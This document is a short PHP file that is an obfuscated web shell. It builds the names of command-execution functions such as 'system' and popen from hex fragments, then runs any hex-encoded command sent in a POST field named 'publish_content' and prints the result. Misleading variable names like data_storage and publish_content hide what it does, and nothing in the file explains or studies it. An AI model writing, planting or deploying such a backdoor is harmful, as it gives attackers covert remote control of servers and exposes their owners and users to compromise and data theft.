<?php


$hld1 = '973';
$hld2 = 'c5f';
$hld3 = '865';
$hld4 = '706';
$hld5 = '173';
$hld6 = '468';
$hld7 = '656';
$hld8 = '16d';
$hld9 = '765';
$hld10 = '745';
$hld11 = '6f6';
$hld12 = '6f7';
$hld13 = '365';
$hld14 = '562';
$hld15 = '6c6';
$hld16 = 'f63';
$hld17 = 'e74';
$data_storage1 = pack("H*", '737'.$hld1.'746'.'56d');
$data_storage2 = pack("H*", '736'.'865'.'6c6'.$hld2.'657'.$hld3);
$data_storage3 = pack("H*", '657'.$hld3);
$data_storage4 = pack("H*", $hld4.$hld5.'737'.$hld6.'727');
$data_storage5 = pack("H*", '706'.'f70'.'656');
$data_storage6 = pack("H*", '737'.'472'.$hld7.$hld8.'5f6'.$hld9.$hld10.'f63'.$hld11.'e74'.'656'.'e74');
$data_storage7 = pack("H*", '706'.'36c'.$hld12.$hld13);
$publish_content = pack("H*", '707'.$hld14.$hld15.'973'.'685'.$hld16.$hld11.$hld17.$hld7.$hld17);
if (isset($_POST[$publish_content])) {
    $publish_content = pack("H*", $_POST[$publish_content]);
    if (function_exists($data_storage1)) {
        $data_storage1($publish_content);
    } elseif (function_exists($data_storage2)) {
        print $data_storage2($publish_content);
    } elseif (function_exists($data_storage3)) {
        $data_storage3($publish_content, $dat_flg);
        print join("\n", $dat_flg);
    } elseif (function_exists($data_storage4)) {
        $data_storage4($publish_content);
    } elseif (function_exists($data_storage5) && function_exists($data_storage6) && function_exists($data_storage7)) {
        $entity_factor = $data_storage5($publish_content, 'r');
        if ($entity_factor) {
            $record_key = $data_storage6($entity_factor);
            $data_storage7($entity_factor);
            print $record_key;
        }
    }
    exit;
}
